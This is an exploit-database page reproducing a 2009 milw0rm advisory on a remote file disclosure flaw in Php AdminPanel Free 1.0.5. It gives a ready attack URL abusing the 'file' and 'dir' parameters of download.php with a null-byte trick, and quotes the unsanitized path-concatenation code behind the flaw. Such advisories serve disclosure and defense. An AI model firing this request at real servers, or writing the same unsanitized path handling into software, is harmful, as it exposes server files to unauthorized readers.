header-logo
Suggest Exploit
vendor:
Php AdminPanel
by:
Sina Yazdanmehr (R3d.W0rm)
7.5
CVSS
HIGH
Remote File Disclosure
Not provided
CWE
Product Name: Php AdminPanel
Affected Version From: 1.0.5
Affected Version To: 1.0.5
Patch Exists: NO
Related CWE: Not provided
CPE: Not provided
Metasploit:
Other Scripts:
Platforms Tested: Not provided
Not provided

Php AdminPanel Free version 1.0.5 Remote File Disclosure

The Php AdminPanel Free version 1.0.5 is vulnerable to remote file disclosure. An attacker can exploit this vulnerability by accessing the download.php script and manipulating the 'file' parameter to disclose sensitive files on the server.

Mitigation:

Upgrade to a patched version of Php AdminPanel or apply necessary security measures to prevent unauthorized access to sensitive files.
Source

Exploit-DB raw data:

#####################################################################################
####         Php AdminPanel Free version 1.0.5 Remote File Disclosure            ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : http://ircrash.com                                                      #
#My Official WebSite : http://r3dw0rm.ir                                            #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)            #
#####################################################################################
#                                                                                   #
#Download : http://www.apphp.com                                                    #
#                                                                                   #
#Dork :  :(                                                                           #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#http://[target]/[adminpanel_path]/modules/datagrid/scripts/download.php?file=export0000&dir=file.type%00
#                                                                                   #
#Note :                                                                             #
#Plz see this code :                                                                #
# .....                                                                             #
# $file_path = "../../".$dir.$file;                                                 #
# .....                                                                             #
#In download.php set file path 2 dir ups.                                           #
###################################### TNX GOD ######################################

# milw0rm.com [2009-07-12]